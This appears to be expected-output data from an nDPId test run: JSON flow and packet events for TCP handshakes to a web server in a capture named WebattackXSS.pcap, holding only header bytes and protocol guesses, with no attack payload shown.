+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3012,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":3,"flow_last_seen":1499347329595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347329595,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ol1AAD4GI3usEAABwKgKMtrkAFD4u+sHr4z8fIAQAOUqogAAAQEICgE6SVoD5BrQ"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3031,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347332137,"flow_last_seen":1499347332137,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347332137,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56062,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3031,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":1,"flow_last_seen":1499347332137,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347332137,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8hpdAAD4GPzmsEAABwKgKMtr+AFAKS81CAAAAAKACchBfGAAAAgQFtAQCCAoBOkvVAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3032,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":2,"flow_last_seen":1499347332137,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347332137,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2v58hG58CkvNQ6AScSBTxwAAAgQFtAQCCAoD5B1LATpL1QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3033,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":3,"flow_last_seen":1499347332138,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347332138,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0hphAAD4GP0CsEAABwKgKMtr+AFAKS81DfIRufYAQAOXyzQAAAQEICgE6S9YD5B1L"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347333419,"flow_last_seen":1499347333419,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333419,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56076,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":1,"flow_last_seen":1499347333419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347333419,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8bENAAD4GWY2sEAABwKgKMtsMAFCNWiFVAAAAAKACchCGpwAAAgQFtAQCCAoBOk0WAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3041,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":2,"flow_last_seen":1499347333420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347333420,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2wzHhupcjVohVqAScSCzMgAAAgQFtAQCCAoD5B6MATpNFgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":3,"flow_last_seen":1499347333420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347333420,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0bERAAD4GWZSsEAABwKgKMtsMAFCNWiFWx4bqXYAQAOVSOgAAAQEICgE6TRYD5B6M"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347200170,"flow_last_seen":1499347205672,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54660,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347200170,"flow_last_seen":1499347205672,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54660,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347201471,"flow_last_seen":1499347206672,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54674,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347201471,"flow_last_seen":1499347206672,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54674,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347202722,"flow_last_seen":1499347208672,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54688,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347202722,"flow_last_seen":1499347208672,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54688,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347205214,"flow_last_seen":1499347210673,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54714,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347205214,"flow_last_seen":1499347210673,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54714,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347206497,"flow_last_seen":1499347211674,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54728,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347206497,"flow_last_seen":1499347211674,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54728,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347207764,"flow_last_seen":1499347213674,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54742,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347207764,"flow_last_seen":1499347213674,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54742,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3052,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347334667,"flow_last_seen":1499347334667,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347334667,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56090,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3052,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":1,"flow_last_seen":1499347334667,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347334667,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ruhAAD4GFuisEAABwKgKMtsaAFCxtOCmAAAAAKACchChtQAAAgQFtAQCCAoBOk5OAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":2,"flow_last_seen":1499347334667,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347334667,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2xqx52s8sbTgp6AScSBhyAAAAgQFtAQCCAoD5B\/EATpOTgEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3054,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":3,"flow_last_seen":1499347334668,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347334668,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rulAAD4GFu+sEAABwKgKMtsaAFCxtOCnsedrPYAQAOUA0AAAAQEICgE6Tk4D5B\/E"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347337226,"flow_last_seen":1499347337226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347337226,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56116,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":1499347337226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347337226,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TYVAAD4GeEusEAABwKgKMts0AFCRRx1LAAAAAKACchCC5AAAAgQFtAQCCAoBOlDOAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3071,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":2,"flow_last_seen":1499347337226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347337226,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2zQKH2urkUcdTKAScSDn0AAAAgQFtAQCCAoD5CJEATpQzgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3072,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":3,"flow_last_seen":1499347337227,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347337227,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0TYZAAD4GeFKsEAABwKgKMts0AFCRRx1MCh9rrIAQAOWG2AAAAQEICgE6UM4D5CJE"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3082,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347338485,"flow_last_seen":1499347338485,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347338485,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56130,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3082,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":1,"flow_last_seen":1499347338485,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347338485,"pkt":"ABm5CmnxAMGxFOsxCABFAAA871JAAD4G1n2sEAABwKgKMttCAFArWL1bAAAAAKACchBHegAAAgQFtAQCCAoBOlIJAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3083,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":2,"flow_last_seen":1499347338485,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347338485,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ20LSM68cK1i9XKAScSCfpgAAAgQFtAQCCAoD5CN+ATpSCQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3084,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":3,"flow_last_seen":1499347338486,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347338486,"pkt":"ABm5CmnxAMGxFOsxCABFAAA071NAAD4G1oSsEAABwKgKMttCAFArWL1c0jOvHYAQAOU+rgAAAQEICgE6UgkD5CN+"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3097,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347339782,"flow_last_seen":1499347339782,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347339782,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3097,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":1,"flow_last_seen":1499347339782,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347339782,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8e9RAAD4GSfysEAABwKgKMttQAFCK9SiZAAAAAKACchB7TQAAAgQFtAQCCAoBOlNNAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3098,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":2,"flow_last_seen":1499347339782,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347339782,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ21AZ1nzCivUomqAScSC87AAAAgQFtAQCCAoD5CTDATpTTQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3099,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":3,"flow_last_seen":1499347339783,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347339783,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0e9VAAD4GSgOsEAABwKgKMttQAFCK9SiaGdZ8w4AQAOVb9AAAAQEICgE6U00D5CTD"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3106,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347341106,"flow_last_seen":1499347341106,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347341106,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3106,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":1,"flow_last_seen":1499347341106,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347341106,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8aWRAAD4GXGysEAABwKgKMtteAFBkzD38AAAAAKACchCKugAAAgQFtAQCCAoBOlSYAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3107,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":2,"flow_last_seen":1499347341106,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347341106,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ217gSFdsZMw9\/aAScSAp8gAAAgQFtAQCCAoD5CYOATpUmAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3108,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":3,"flow_last_seen":1499347341107,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347341107,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aWVAAD4GXHOsEAABwKgKMtteAFBkzD394EhXbYAQAOXI+QAAAQEICgE6VJgD5CYO"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3115,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347342386,"flow_last_seen":1499347342386,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347342386,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56172,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3115,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":1,"flow_last_seen":1499347342386,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347342386,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8DyJAAD4Gtq6sEAABwKgKMttsAFDfC1r6AAAAAKACchDyLgAAAgQFtAQCCAoBOlXYAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3116,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":2,"flow_last_seen":1499347342386,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347342386,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ22zAs3dz3wta+6AScSCPtAAAAgQFtAQCCAoD5CdOATpV2AEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3117,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":3,"flow_last_seen":1499347342387,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347342387,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DyNAAD4GtrWsEAABwKgKMttsAFDfC1r7wLN3dIAQAOUuvAAAAQEICgE6VdgD5CdO"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3127,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347343672,"flow_last_seen":1499347343672,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343672,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56186,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3127,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":1499347343672,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347343672,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83PZAAD4G6NmsEAABwKgKMtt6AFBC4YvvAAAAAKACchBcFQAAAgQFtAQCCAoBOlcZAAAAAAEDAwc="} 